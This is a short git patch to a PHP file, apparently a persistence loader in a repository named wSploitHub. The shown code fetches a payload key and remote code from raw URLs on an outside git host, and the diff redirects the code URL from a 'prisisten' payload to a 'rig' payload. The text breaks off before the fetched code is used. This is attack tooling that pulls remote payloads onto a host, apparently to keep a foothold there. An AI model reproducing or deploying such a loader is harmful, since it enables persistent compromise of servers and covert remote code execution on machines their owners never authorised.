From eb5709f4a1226d69385ec2adc431a744df9c4461 Mon Sep 17 00:00:00 2001 From: syn Date: Wed, 29 Jan 2025 20:14:17 +0700 Subject: [PATCH] ternak: update presisten rig --- farm/presrig.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/farm/presrig.php b/farm/presrig.php index 89b3d97..43f6177 100644 --- a/farm/presrig.php +++ b/farm/presrig.php @@ -11,7 +11,7 @@ function get_contents($url) { return $result; } $hashUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/api/v2/payloadkey'; -$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/raw/php/prisisten'; +$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/farm/rig/rig'; $keyHash = trim(get_contents($hashUrl)); if (empty($keyHash)) { die("Die! Hash URL.\n");